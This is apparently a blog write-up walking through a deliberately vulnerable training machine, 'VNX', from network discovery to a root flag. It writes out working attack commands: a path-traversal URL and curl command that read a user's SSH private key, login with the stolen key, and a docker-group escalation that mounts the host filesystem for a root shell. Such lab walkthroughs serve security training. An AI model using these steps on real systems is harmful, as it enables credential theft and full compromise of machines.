cd ../
Write-UPSJul 14, 2026 • 10 min read

VNX Machine Walkthrough:

VNX is a deliberately built vulnerable lab designed to provide hands-on experience in penetration testing. By obtaining root access, it serves as an accessible challenge for beginners.

Download the VNX Machine

Google Drive Archive

Step 1: Find the IP

First, set both the victim and attacker machine to a Host-only Adapter (Bridged is also possible, but we use host-only for this tutorial).

Network Adapter Settings

We can find the IP of the device by using Netdiscover:

bash
sudo netdiscover
Netdiscover Output

Step 2: Finding Open Ports

Use Nmap to look out for open ports on the target IP:

bash
nmap -F -sV <target-ip>

Nmap revealed two open ports:

  • 22 (SSH) running OpenSSH 8.2p1
  • 80 (HTTP) running Apache 2.4.41

The service versions indicate the target is likely an Ubuntu-based Linux system.

Nmap Scan Results

Step 3 & 4: Web Enumeration

Opening the IP in the browser reveals a default Apache landing page:

Apache Default Page

We use Gobuster to find hidden endpoints and directories within the server:

bash
gobuster dir -u http://<target-ip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 10
Gobuster Scan Results

Gobuster reveals the existence of a page named /ctf. Opening the page gives us this clue:

CTF Page Clue

From this clue, we can assume command execution—or at least that the ?page= parameter opens a file directly via Local File Inclusion (LFI).

Step 5: Find and Inject the Payload

We employ a Directory Enumeration Vulnerability to obtain the SSH key via the browser:

browser
http://<target-ip>/ctf/?page=../../../../home/vnx/.ssh/id_rsa

We receive the following key. Save it to a text file (naming it vnx_key in this case):

RSA Key in Browser

Download the key directly and assign it the correct strict permissions required by SSH:

bash
curl "http://<target-ip>/ctf/?page=../../../../home/vnx/.ssh/id_rsa" -o vnx_key chmod 600 vnx_key

Step 6: Log onto SSH

Enter the following command to log in using our extracted SSH key:

bash
ssh -i vnx_key vnx@<target-ip>
Successful SSH Login

Let's audit the account to find any possible privilege escalation vectors:

bash
id
output
uid=1001(vnx) gid=1001(vnx) groups=1001(vnx),136(docker)

The fact that our user is part of the docker group is our entry point for escalation.

Step 7: Setting up the Attack

1. Install alpine docker on Kali (attacker OS):
sudo docker save alpine -o alpine.tar
2. Send alpine.tar to victim's machine:
sudo scp -i vnx_key alpine.tar vnx@<target-ip>:/tmp/
3. Load alpine into docker images on the victim machine:
docker load -i alpine.tar
4. Verify the image is loaded:
docker images
Docker Images Output

Step 8 & 9: Privilege Escalation & Flag

On the victim's machine, run the following command to map the root directory to a volume inside a new Docker container and drop into a shell. Since Docker runs as root, this effectively gives us a root shell:

bash
docker run -it --rm -v /:/mnt alpine chroot /mnt sh
Root Shell Access

Through some quick enumeration in the root directory, we find our prize:

bash
cd root cat root.txt
Flag File

Machine Compromised

FLAG{docker_socket_is_root}